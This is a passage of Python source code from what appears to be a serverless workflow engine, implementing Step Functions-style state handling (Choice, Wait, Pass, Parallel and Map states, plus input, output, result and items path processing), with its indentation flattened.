parentMapInfo = self.parsedfunctionstateinfo["ParentMapInfo"]
#self._logger.debug("[StateUtils] processBranchTerminalState:parentMapInfo: " + str(parentMapInfo))
mapName = parentMapInfo["Name"]
#self._logger.debug("[StateUtils] processBranchTerminalState:mapName: " + str(mapName))
mapInfoKey = mapName + "_" + key + "_map_info"
#self._logger.debug("[StateUtils] processBranchTerminalState:mapInfoKey: " + str(mapInfoKey))
branchCounter = parentMapInfo["BranchCounter"]
#self._logger.debug("[StateUtils] processBranchTerminalState: ")
#self._logger.debug("\t ParentMapInfo:" + json.dumps(parentMapInfo))
#self._logger.debug("\t mapName:" + mapName)
#self._logger.debug("\t branchCounter: " + str(branchCounter))
#self._logger.debug("\t key:" + key)
#self._logger.debug("\t metadata:" + json.dumps(metadata))
#self._logger.debug("\t value_output(type):" + str(type(value_output)))
#self._logger.debug("\t value_output:" + value_output)
if mapInfoKey in metadata:
mapInfo = metadata[mapInfoKey]
rest = metadata["__function_execution_id"].split("_")[1:]
for codes in rest: # find marker for map state and use it to calculate curent index
if "-M" in codes:
index = rest.index(codes)
current_index = int(rest[index].split("-M")[0])
self._logger.debug("[StateUtils] current_index: " + str(current_index))
if mapInfo["MaxConcurrency"] != 0:
current_index = current_index % int(mapInfo["MaxConcurrency"])
counterName = str(mapInfo["CounterName"])
branchOutputKeys = mapInfo["BranchOutputKeys"]
#branchOutputKey = str(branchOutputKeys[branchCounter-1])
branchOutputKey = str(branchOutputKeys[current_index])
branchOutputKeysSetKey = str(mapInfo["BranchOutputKeysSetKey"])
self._logger.debug("\t branchOutputKey:" + branchOutputKey)
self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
assert py3utils.is_string(branchOutputKey)
sapi.put(branchOutputKey, value_output)
assert py3utils.is_string(branchOutputKeysSetKey)
sapi.addSetEntry(branchOutputKeysSetKey, branchOutputKey)
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# increment the triggerable counter
dlc.incrementCounter(counterName, 1, tableName=dlc.countertriggerstable)
except Exception as exc:
self._logger.error("Exception incrementing counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
else:
self._logger.error("[StateUtils] processBranchTerminalState Unable to find MapInfo")
raise Exception("processBranchTerminalState Unable to find MapInfo")
def evaluatePostParallel(self, function_input, key, metadata, sapi):
#self._logger.debug("[StateUtils] evaluatePostParallel: ")
#self._logger.debug("\t key:" + key)
#self._logger.debug("\t metadata:" + json.dumps(metadata))
#self._logger.debug("\t function_input: " + str(function_input))
action = metadata["__state_action"]
assert action == "post_parallel_processing"
counterValue = function_input["CounterValue"]
workflow_instance_metadata_storage_key = str(function_input["WorkflowInstanceMetadataStorageKey"])
assert py3utils.is_string(workflow_instance_metadata_storage_key)
full_metadata_encoded = sapi.get(workflow_instance_metadata_storage_key)
# self._logger.debug("[StateUtils] full_metadata_encoded: " + str(full_metadata_encoded))
full_metadata = json.loads(full_metadata_encoded)
parallelInfoKey = self.functionstatename + "_" + key + "_parallel_info"
parallelInfo = full_metadata[parallelInfoKey]
branchOutputKeysSetKey = str(parallelInfo["BranchOutputKeysSetKey"])
branchOutputKeysSet = sapi.retrieveSet(branchOutputKeysSetKey)
if not branchOutputKeysSet:
self._logger.error("[StateUtils] branchOutputKeysSet is empty")
raise Exception("[StateUtils] branchOutputKeysSet is empty")
k_list = parallelInfo["Klist"]
#self._logger.debug("\t action: " + action)
#self._logger.debug("\t counterValue:" + str(counterValue))
#self._logger.debug("\t WorkflowInstanceMetadataStorageKey:" + metadata["WorkflowInstanceMetadataStorageKey"])
#self._logger.debug("\t full_metadata:" + full_metadata_encoded)
#self._logger.debug("\t parallelInfoKey:" + parallelInfoKey)
#self._logger.debug("\t parallelInfo:" + json.dumps(parallelInfo))
#self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
#self._logger.debug("\t branchOutputKeysSet:" + str(branchOutputKeysSet))
#self._logger.debug("\t k_list:" + str(k_list))
NumBranchesFinished = abs(counterValue)
#self._logger.debug("\t NumBranchesFinished:" + str(NumBranchesFinished))
do_cleanup = False
if k_list[-1] == NumBranchesFinished:
do_cleanup = True
#self._logger.debug("\t do_cleanup:" + str(do_cleanup))
counterName = str(parallelInfo["CounterName"])
assert py3utils.is_string(counterName)
counter_metadata_key_name = counterName + "_metadata"
if do_cleanup:
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# done with the triggerable counter
dlc.deleteCounter(counterName, tableName=dlc.countertriggerstable)
dlc.delete(counter_metadata_key_name, tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception deleting counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
#self._logger.debug("\t deleted Counter: " + counterName)
sapi.delete(workflow_instance_metadata_storage_key)
post_parallel_output_values = []
#self._logger.debug("\t parallelInfo_BranchOutputKeys:" + str(parallelInfo["BranchOutputKeys"]))
for outputkey in parallelInfo["BranchOutputKeys"]:
outputkey = str(outputkey)
if outputkey in branchOutputKeysSet:
#self._logger.debug("\t BranchOutputKey:" + outputkey)
while sapi.get(outputkey) == "":
time.sleep(0.1) # wait until value is available
branchOutput = sapi.get(outputkey)
branchOutput_decoded = json.loads(branchOutput)
#self._logger.debug("\t branchOutput(type):" + str(type(branchOutput)))
#self._logger.debug("\t branchOutput:" + branchOutput)
#self._logger.debug("\t branchOutput_decoded(type):" + str(type(branchOutput_decoded)))
#self._logger.debug("\t branchOutput_decoded:" + str(branchOutput_decoded))
post_parallel_output_values = post_parallel_output_values + [branchOutput_decoded]
if do_cleanup:
sapi.delete(outputkey) # cleanup the key from data layer
#self._logger.debug("\t cleaned output key:" + outputkey)
else:
post_parallel_output_values = post_parallel_output_values + [None]
#self._logger.debug("\t post_parallel_output_values:" + str(post_parallel_output_values))
if do_cleanup:
sapi.deleteSet(branchOutputKeysSetKey)
if "Next" in self.parsedfunctionstateinfo:
#self._logger.debug("\t add_dynamic_next:" + self.parsedfunctionstateinfo["Next"])
sapi.add_dynamic_next(self.parsedfunctionstateinfo["Next"], post_parallel_output_values)
#ToDo: need to check if Parallel state itself is terminal state
if "End" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["End"]:
#self._logger.debug("\t add_dynamic_next:" + self.parsedfunctionstateinfo["Next"])
sapi.add_dynamic_next("end", post_parallel_output_values)
return function_input, full_metadata
def evaluateNonTaskState(self, function_input, key, metadata, sapi):
# 3. Evaluate Non Task states
#self._logger.debug("[StateUtils] NonTask state type: " + str(self.functionstatetype))
#self._logger.debug("[StateUtils] Welcome to evaluateNonTaskState! Current key:" + str(key))
function_output = None
if self.functionstatetype == StateUtils.choiceStateType:
#self._logger.debug("[StateUtils] Choice state info:" + str(self.functionstateinfo))
self.evaluateChoiceConditions(function_input) # this sets chosen Next state
#self._logger.debug("[StateUtils] Choice state Next:" + str(self.choiceNext))
function_output = function_input # output of the Choice state
elif self.functionstatetype == StateUtils.waitStateType:
#self._logger.debug("[StateUtils] Wait state info:" + str(self.functionstateinfo))
function_output = function_input
if "Seconds" in list(json.loads(self.functionstateinfo).keys()):
wait_state_seconds = json.loads(self.functionstateinfo)['Seconds']
#self._logger.debug("[StateUtils] Wait state seconds:" + str(wait_state_seconds))
time.sleep(float(wait_state_seconds))
elif "SecondsPath" in list(json.loads(self.functionstateinfo).keys()):
wait_state_secondspath = json.loads(self.functionstateinfo)['SecondsPath']
#self._logger.debug("[StateUtils] Wait state secondspath:" + str(wait_state_secondspath))
wait_state_secondspath_data = [match.value for match in parse(wait_state_secondspath).find(function_input)]
if wait_state_secondspath_data == []:
#self._logger.exception("[StateUtils] Wait state timestamppath does not match: " + str(wait_state_secondspath))
raise Exception("Wait state timestamppath does not match")
#self._logger.debug("[StateUtils] Wait state timestamppath data parsed:" + str(wait_state_secondspath_data[0]))
time.sleep(float(wait_state_secondspath_data[0]))
elif "Timestamp" in list(json.loads(self.functionstateinfo).keys()):
wait_state_timestamp = json.loads(self.functionstateinfo)['Timestamp']
#self._logger.debug("[StateUtils] Wait state timestamp:" + str(wait_state_timestamp))
target_time = datetime.strptime(str(wait_state_timestamp), "%Y-%m-%dT%H:%M:%SZ")
current_time = datetime.utcnow()
#self._logger.debug("[StateUtils] Wait state timestamp difference" + str(current_time) + str(target_time))
remaining = (target_time - current_time).total_seconds()
#self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining))
remaining_time = float(remaining)
if remaining_time > 0:
time.sleep(remaining_time)
else:
self._logger.error("[StateUtils] Wait state timestamp target lies in the past!" + str(wait_state_timestamp))
elif "TimestampPath" in list(json.loads(self.functionstateinfo).keys()):
wait_state_timestamppath = json.loads(self.functionstateinfo)['TimestampPath']
self._logger.debug("[StateUtils] Wait state timestamppath:" + str(wait_state_timestamppath))
# need to communicate with datalayer for definition of trigger for hibernating/resuming task
wait_state_timestamppath_data = [match.value for match in parse(wait_state_timestamppath).find(function_input)]
if wait_state_timestamppath_data == []:
#self._logger.exception("[StateUtils] Wait state timestamp_path does not match: " + str(wait_state_timestamppath))
raise Exception("Wait state timestamp_path does not match")
self._logger.debug("[StateUtils] Wait state timestamppath data parsed:" + str(wait_state_timestamppath_data[0]))
target_time = datetime.strptime(str(wait_state_timestamppath_data[0]), "%Y-%m-%dT%H:%M:%SZ")
self._logger.debug("[StateUtils] Wait state timestamp data" + str(target_time))
current_time = datetime.utcnow()
self._logger.debug("[StateUtils] Wait state timestamp difference" + str(current_time) + str(target_time))
remaining = (target_time - current_time).total_seconds()
self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining))
remaining_time = float(remaining)
self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining_time))
if remaining_time > 0:
time.sleep(remaining_time)
else:
self._logger.error("[StateUtils] Wait state timestamp target lies in the past!" + str(wait_state_timestamppath_data[0]))
raise Exception("Wait state timestamp target lies in the past!" + str(wait_state_timestamppath_data[0]))
else:
#self._logger.exception("[StateUtils] Wait state: Missing required field")
raise Exception("Wait state: Missing required field")
elif self.functionstatetype == StateUtils.passStateType:
self._logger.debug("[StateUtils] Pass state handling, received value:" + str(function_input))
function_output = function_input
if "Result" in self.functionstateinfo:
pass_state_result = json.loads(self.functionstateinfo)['Result']
self._logger.debug("[StateUtils] Pass state result:" + str(pass_state_result))# self.functionstateinfo['Result']))
function_output = pass_state_result
elif self.functionstatetype == StateUtils.succeedStateType:
function_output = function_input
elif self.functionstatetype == StateUtils.failStateType:
self._logger.debug("[StateUtils] Fail state handling, received value:" + str(function_input))
self._logger.debug("[StateUtils] Fail state handling, received metadata:" + str(metadata))
if "Cause" in self.functionstateinfo:
fail_state_cause = json.loads(self.functionstateinfo)['Cause']
self._logger.debug("[StateUtils] Fail state cause info:" + str(fail_state_cause))
if "Error" in self.functionstateinfo:
error_state_error = json.loads(self.functionstateinfo)['Error']
self._logger.debug("[StateUtils] Fail state error info:" + str(error_state_error))
function_output = function_input
elif self.functionstatetype == StateUtils.parallelStateType:
self._logger.debug("[StateUtils] Parallel state handling function_input: " + str(function_input))
self._logger.debug("[StateUtils] Parallel state handling metadata: " + str(metadata))
self._logger.debug("[StateUtils] Parallel state handling")
if "__state_action" not in metadata or metadata["__state_action"] != "post_parallel_processing":
function_output, metadata = self.evaluateParallelState(function_input, key, metadata, sapi)
else:
if metadata["__state_action"] == "post_parallel_processing":
function_output, metadata = self.evaluatePostParallel(function_input, key, metadata, sapi)
elif self.functionstatetype == StateUtils.mapStateType:
name_prefix = self.functiontopic + "_" + key
self._logger.debug("[StateUtils] Map state handling function_input: " + str(function_input))
self._logger.debug("[StateUtils] Map state handling metadata: " + str(metadata))
if "MaxConcurrency" in self.parsedfunctionstateinfo.keys():
maxConcurrency = int(self.parsedfunctionstateinfo["MaxConcurrency"])
else:
maxConcurrency = 0
self._logger.debug("[StateUtils] Map state maxConcurrency: " + str(maxConcurrency))
self._logger.debug("[StateUtils] Map state handling")
if "__state_action" not in metadata or metadata["__state_action"] != "post_map_processing":
# here we start the iteration process on a first batch
if maxConcurrency != 0:
tobeProcessednow = function_input[:maxConcurrency] # take the first maxConcurrency elements
tobeProcessedlater = function_input[maxConcurrency:] # keep the remaining elements for later
else:
tobeProcessednow = function_input
tobeProcessedlater = []
self._logger.debug("[StateUtils] Map state function_input split:" + str(tobeProcessednow) + " " + str(tobeProcessedlater))
sapi.put(name_prefix + "_" + "tobeProcessedlater", str(tobeProcessedlater)) # store elements to be processed on DL
sapi.put(name_prefix + "_" + "mapStatePartialResult", "[]") # initialise the collector variable
sapi.put(name_prefix + "_" + "mapInputCount", str(len(function_input)))
"""
metadata["tobeProcessedlater"] = str(tobeProcessedlater) # store elements to be processed on DL
metadata["mapStatePartialResult"] = "[]" # initialise the collector variable
metadata["mapInputCount"] = str(len(function_input))
"""
function_output, metadata = self.evaluateMapState(tobeProcessednow, key, metadata, sapi)
elif metadata["__state_action"] == "post_map_processing":
tobeProcessedlater = ast.literal_eval(sapi.get(name_prefix + "_" + "tobeProcessedlater")) # get all elements that have not yet been processed
#tobeProcessedlater = ast.literal_eval(self._mapStateInfo["tobeProcessedlater"]) # get all elements that have not yet been processed
self._logger.debug("[StateUtils] Map state post_map processing input:" + str(tobeProcessedlater))
# we need to decide at this point if there is a need for more batches. if so:
if len(tobeProcessedlater) > 0: # we need to start another batch
function_output, metadata2 = self.evaluatePostMap(function_input, key, metadata, sapi) # take care not to overwrite metadata
function_output, metadata = self.evaluateMapState(tobeProcessedlater[:maxConcurrency], key, metadata, sapi) # start a new batch
sapi.put(name_prefix + "_" + "tobeProcessedlater", str(tobeProcessedlater[maxConcurrency:])) # store remaining elements to be processed on DL
#self._mapStateInfo["tobeProcessedlater"] = str(tobeProcessedlater[maxConcurrency:]) # store remaining elements to be processed on DL
else: # no more batches required. we are at the iteration end, publish the final result
self._logger.debug("[StateUtils] Map state input final stage: " + str(function_input))
function_output, metadata = self.evaluatePostMap(function_input, key, metadata, sapi)
else:
raise Exception("Unknow action type in map state")
else:
raise Exception("Unknown state type")
return function_output, metadata
def applyResultPath(self, raw_state_input, function_output):
#4. Apply ResultPath, if available and if not 'Parallel' state
# if ResultPath:
# if ResultPath == '$' (this is the default value)
# raw_state_input_midway = function_output
# if ResultPath == 'null'
# raw_state_input_midway = raw_state_input
# if ResultPath == some variable name
# raw_state_input[some variable name] = function_output
# raw_state_input_midway = raw_state_input
# else:
# raw_state_input_midway = function_output
#
raw_state_input_midway = raw_state_input
#self._logger.debug("Reached applyResultPath: " + str(self.result_path_dict))
try:
if self.result_path_dict and 'ResultPath' in self.result_path_dict:
raw_state_input_midway = self.process_result_path(self.result_path_dict, raw_state_input, function_output)
else:
raw_state_input_midway = function_output
return raw_state_input_midway
except Exception as exc:
raise Exception("Result path processing exception: " + str(exc))
#self._logger.exception("Result path processing exception")
#sys.stdout.flush()
#self._logger.exception(exc)
#raise
def applyOutputPath(self, raw_state_input_midway):
#5. Apply OutputPath, if available
# if OutputPath:
# if OutputPath == '$' (this is the default value)
# raw_state_output = raw_state_input_midway
# if OutputPath = 'null'
# raw_state_output = {}
# if OutputPath == some existing variable in 'raw_state_input_midway'
# raw_state_output = raw_state_input_midway[some existing variable]
# if OutputPath == some non-existing variable
# throw exception
# else:
# raw_state_output = raw_state_input_midway
raw_state_output = raw_state_input_midway
try:
if self.output_path_dict and 'OutputPath' in self.output_path_dict:
raw_state_output = self.process_output_path(self.output_path_dict, raw_state_input_midway)
else:
raw_state_output = raw_state_input_midway
return raw_state_output
except Exception as exc:
raise Exception("Output path processing exception: " + str(exc))
#self._logger.exception("Output path processing exception")
#sys.stdout.flush()
#self._logger.exception(exc)
#raise
def parse_function_state_info(self):
if self.functionstatetype == StateUtils.defaultStateType:
#self._logger.debug("Task_SAND state parsing. Not parsing further")
return
else:
self.parsedfunctionstateinfo = json.loads(self.functionstateinfo)
statedef = self.parsedfunctionstateinfo
statetype = self.functionstatetype
assert statetype == statedef['Type']
if statetype == StateUtils.waitStateType:
self._logger.debug("Wait state parsing")
if statetype == StateUtils.failStateType:
self._logger.debug("Fail state parsing")
if statetype == StateUtils.succeedStateType:
self._logger.debug("Succeed state parsing")
if statetype == StateUtils.taskStateType:
#self._logger.debug("Task state parsing")
if "InputPath" in statedef: # read the I/O Path dicts
self.input_path_dict['InputPath'] = statedef['InputPath']
#self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
#self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
if "Catch" in statedef:
self.catcher_list = statedef['Catch']
# parse it once and store it
self.catcher_list = ast.literal_eval(str(self.catcher_list))
#self._logger.debug("found Catchers: " + str(self.catcher_list))
if "Retry" in statedef:
self.retry_list = statedef['Retry']
# parse it once and store it
self.retry_list = ast.literal_eval(str(self.retry_list))
#self._logger.debug("found Retry: " + str(self.retry_list))
if statetype == StateUtils.choiceStateType:
#self._logger.debug("Choice state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(statedef['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(statedef['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
self._logger.debug("Choice state rules: " + json.dumps(statedef))
if "Default" in statedef:
self.default_next_choice.append(statedef["Default"])
self._logger.debug("DefaultTarget: " + str(self.default_next_choice))
#choice_state_default = statedef['Default']
choices_list = statedef['Choices'] # get the choice rule list for this state
self._logger.debug("Choice state rules list: " + str(choices_list))
key_dict = {} # parse the choice rule list into an expression tree
for choices in choices_list:
self._logger.debug("Choice state rule element processed: " + json.dumps(list(choices.keys())))
#self._logger.debug("converted_function_output: " + str(converted_function_output))
operator_counter = 0
if ("Not" in list(choices.keys())) or ("And" in list(choices.keys())) or ("Or" in list(choices.keys())):
operator_counter += 1
if operator_counter == 0: # No operators, so no recursive evaluation required
self.traverse(choices['Next'], choices)
hostname = self.nodelist[-1].split("/")[0]
childname = self.nodelist[-1].split("/")[1]
previousnode = anytree.Node(choices['Next'])
root = previousnode
key_dict[hostname] = previousnode
previousnode = anytree.Node(childname, parent=previousnode) # key_dict[hostname])
#evalname = ast.literal_eval(str(previousnode.name))
else: # operator detected, we need to traverse the choice rule tree
self.traverse(choices['Next'], choices)
nodename = self.nodelist[-1].split("/")[0]
previousnode = anytree.Node(nodename)
root = previousnode
key_dict[self.nodelist[-1].split("/{")[0]] = previousnode
no_childs = 1 # we already have attached the root
for i in range(len(self.nodelist)): # count the nodes in the choice rule tree which do not have childs
children = self.nodelist[-(i+1)].split("/")[-1]
if children.strip("") == "{}":
no_childs += 1
for i in range(no_childs):
nodename = self.nodelist[-(i+2)].split("/")[i+1]
previousnode = anytree.Node(nodename, parent=previousnode)
key_dict[self.nodelist[-(i+2)].split("/{")[0]] = previousnode
# from now on we have to attach the children expressions
for i in range(len(self.nodelist)-no_childs):
childname = self.nodelist[-(i+no_childs+1)].split("/")[-1]
hostname = self.nodelist[-(i+no_childs+1)].split("/{")[0]
previousnode = anytree.Node(childname, key_dict[hostname])
#test = EvaluateNode(root.children[0])
#self._logger.debug("Evaluate: " + str(test) + ", Next: " + choices['Next']) # + str(json.dumps(value))
#input_json={}
#self._logger.debug("value type: " + value)
#for key in value.keys():
#if key in test:
#self._logger.debug("Modified Evaluate: " + key)
#test.replace(key, test[key])
#self._logger.debug("Modified Evaluate: " + test)
##self._logger.debug("Resulting Rendered Tree: " + str(anytree.RenderTree(root)))
self.parsed_trees.append(root)
#if statedef[substates]['Type'] == "Task":
# self._logger.debug("Task state: " + json.dumps(statedef[substates]))
if statetype == StateUtils.passStateType:
self._logger.debug("[StateUtils] Pass state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
#self._logger.debug("found Next: " + json.dumps(statedef['Next']))
#self._logger.debug("found Result: " + json.dumps(statedef['Result']))
if statetype == StateUtils.parallelStateType:
#self._logger.debug("[StateUtils] Parallel state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
if statetype == StateUtils.mapStateType:
#self._logger.debug("[StateUtils] Parallel state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "ItemsPath" in statedef:
self.items_path_dict['ItemsPath'] = statedef['ItemsPath']
self._logger.debug("found ItemsPath: " + json.dumps(self.items_path_dict['ItemsPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
def EvaluateNode(self, node):
"""
Recursively parse the expression tree starting from given node into a python statement
"""
if not node.children: # this is a leaf node
evalname = json.dumps(ast.literal_eval(str(node.name)))
#type(evalname) == int or type(evalname) == float:
ev_expr = "(" + self.evaluate(evalname) + ")"
return ev_expr
else: #node is an operator
if node.name == "Not": # there can be only one child
child = node.children[0]
evalname = json.dumps(ast.literal_eval(str(child.name)))
ev_expr = self.evaluate(evalname)
return "not (%s)" % ev_expr
if node.name == "And": # collect all children recursively
child_and_array = []
for child in node.children:
child_and_array.append(self.EvaluateNode(child))
returnstr = "(" + " and ".join(child_and_array) + ")"
return returnstr
if node.name == "Or": # collect all children recursively
child_or_array = []
for child in node.children:
child_or_array.append(self.EvaluateNode(child))
returnstr = "(" + " or ".join(child_or_array) + ")"
return returnstr
else: #unknown operator found here. Thow some error!
raise Exception("Parse Error: unknown operator found: ", node.name)
def evaluate(self, expression):
"""
evaluate a AWS Choice rule expression with the data contained in values
"""
expr = []
ex = json.loads(expression)
self._logger.debug(expression)
vals = {}
if "Variable" in ex.keys():
k = ex["Variable"].split("$.")[1]
vals[k] = ""
expr.append(k)
for op in self.operators:
if op in ex.keys():
expr.append(self.operators_python[self.operators.index(op)])
expr.append(ex[op])
break
if isinstance(expr[2], (int, float)):
result = "%s %s %s" % (expr[0], expr[1], expr[2])
else:
result = "%s %s '%s'" % (expr[0], expr[1], expr[2]) # we want to compare strings with strings
return result
def process_parameters(self, parameters, state_data):
"""
evaluate JSON path Paramaters in conjunction with state_data
"""
parameters = parameters['Parameters']
ret_value = None
ret_item_value = None
if parameters == "$": # return unfiltered input data
ret_value = state_data
elif parameters is None: #return empty json
ret_value = {}
else: # contains a parameter filter, get it and return selected kv pairs
ret_value = {}
ret_index = {}
for key in parameters.keys(): # process parameters keys
if key.casefold() == "comment".casefold(): # ignore
ret_value[key] = parameters[key]
elif parameters[key] == "$$.Map.Item.Value": # get Items key
value_key = key.split(".$")[0]
ret_value = value_key
ret_item_value = value_key
elif parameters[key] == "$$.Map.Item.Index": # get Index key
index_key = key.split(".$")[0]
ret_index = index_key
else: # processing more complex Parameters values
if isinstance(parameters[key], dict): # parameters key refers to dict value
ret_value[key] = {}
for k in parameters[key]: # get nested keys
if not k.split(".")[-1] == "$": # parse static value
print (parameters[key][k])
ret_value[key][k] = parameters[key][k]
else:
new_key = k.split(".$")[0] # use the json paths in paramters to match
ret_value[key][new_key] = [match.value for match in parse(parameters[key][k]).find(state_data)][0]
return ret_value
if isinstance(parameters[key], str): # parameters key refers to string value
ret_value = {}
new_key = key.split(".$")[0] # get the parameters key
query_key = parameters[key].split("$.")[1] # correct the correspondig value
new_value = state_data[query_key] # save the actual value before replacing the key
for kk in state_data.keys():
if isinstance(state_data[kk], dict): # value encapsulates dict
ret_value[new_key] = new_value
if ret_item_value != None:
ret_value[ret_item_value] = state_data[kk]
else:
raise Exception("Error: item value is not set!")
ret_value_dict = {}
ret_value_dict[kk] = ret_value
return ret_value_dict
if isinstance(state_data[kk], list): # value encapsulates list
ret_value_list = []
for data in state_data[kk]:
ret_value_list.append({new_key: new_value, ret_item_value: data})
ret_value_dict = {}
ret_value_dict[kk] = ret_value_list
return ret_value_dict
else:
raise Exception("Error: invaldid Parmeters format: " + str(parameters[key]))
# calculate transformed state output provided to Iterator
ret_total = []
ret_total_dict = {}
if isinstance(state_data, dict):
for kk in state_data.keys():
for key in state_data[kk]:
if ret_value != {} and ret_index == {}:
ret_total.append({ret_value: key})
elif ret_value == {} and ret_index != {}:
ret_total.append({ret_index: state_data[kk].index(key) })
elif ret_value != {} and ret_index != {}:
ret_total.append({ret_value: key, ret_index: state_data[kk].index(key) })
else:
raise Exception("Map State Parameters parse error on dict input: " + str(state_data))
ret_total_dict[kk] = ret_total
ret_value = ret_total_dict
elif isinstance(state_data, list):
for key in state_data:
if ret_value != {} and ret_index == {}:
ret_total.append({ret_value: key})
elif ret_value == {} and ret_index != {}:
ret_total.append({ret_index: state_data.index(key) })
elif ret_value != {} and ret_index != {}:
ret_total.append({ret_value: key, ret_index: state_data.index(key) })
else:
raise Exception("Map State Parameters parse error on list input: " + str(list))
ret_value = ret_total
else:
raise Exception("Map state parse error: invalid state input")
return ret_value
def process_items_path(self, path_fields, state_data):
ret_value = None
if 'ItemsPath' not in list(path_fields.keys()):
path_fields['ItemsPath'] = "$"
input_path = path_fields['ItemsPath']
if input_path == "$": # return unfiltered input data
ret_value = state_data
elif input_path is None: #return empty list
ret_value = []
else: # it contains a filter, get it and return selected list in input
self._logger.debug("seeing items_path filter: " + str(input_path) + " " + str(state_data))
filtered_state_data = [match.value for match in parse(input_path).find(state_data)]
if not filtered_state_data:
raise Exception("Items Path processing exception: no match with map state item, invalid path!")
else:
filtered_state_data = [match.value for match in parse(input_path).find(state_data)][0]
ret_value = filtered_state_data
return ret_value
def process_input_path(self, path_fields, state_data):
ret_value = None
if 'InputPath' not in list(path_fields.keys()):
path_fields['InputPath'] = "$"
#return state_data
input_path = path_fields['InputPath']
if input_path == "$": # return unfiltered input data
ret_value = state_data
elif input_path is None: #return empty dict
ret_value = {}
else: # input_path contains a filter, get and apply it
self._logger.debug("seeing input_path filter: " + str(input_path) + " " + str(state_data))
filtered_state_data = [match.value for match in parse(input_path).find(state_data)]
self._logger.debug("after seeing input_path filter: " + str(filtered_state_data))
if not filtered_state_data:
raise Exception("Input Path processing exception: no match with state input item, invalid path!")
else:
filtered_state_data = [match.value for match in parse(input_path).find(state_data)][0]
ret_value = filtered_state_data
return ret_value
def nested_dict(self, keys, value):
if len(keys) == 1:
return {keys[0]: value}
return {keys[0]: self.nested_dict(keys[1:], value)}
def process_result_path(self, path_fields, state_data, task_output):
ret_value = None
# path_fields: result path dict
# state_data: input dict
# task_output: output of the state/task
if 'ResultPath' not in list(path_fields.keys()):
path_fields['ResultPath'] = "$"
result_path = path_fields['ResultPath']
if result_path == "$":
ret_value = state_data
elif result_path is None:
ret_value = {}
else: # result_path is not empty so is there a match?
self._logger.debug("inside ResultPath processing: " + str(result_path) + " " + str(task_output) )
keys = list(tokenize(result_path)) # get all keys
filtered_state_data = self.nested_dict(keys[1:], task_output)
if isinstance(state_data, dict):
ret_value = dict(list(filtered_state_data.items()) + list(state_data.items())) # adding key and values to new dict
else:
ret_value = filtered_state_data
return ret_value
def process_output_path(self, path_fields, raw_state_input_midway):
ret_value = None
if 'OutputPath' not in list(path_fields.keys()):
path_fields['OutputPath'] = "$"
output_path = path_fields['OutputPath']
if output_path == "$":
ret_value = raw_state_input_midway
elif output_path is None:
ret_value = {}
else: # output_path is not empty so is there a match?
filtered_state_data = [match.value for match in parse(output_path).find(raw_state_input_midway)]
if not filtered_state_data:
raise Exception("Exception: no match with state input item, invalid path!")
else:
key = str(parse(output_path).nodes[-1].value[0])
filtered_state_data = raw_state_input_midway[key]
ret_value = filtered_state_data
return ret_value
def traverse(self, path, obj):
"""
Traverse the object recursively and print every path / value pairs.
"""
cnt = -1
if isinstance(obj, dict):
d = obj
d_sum = {}
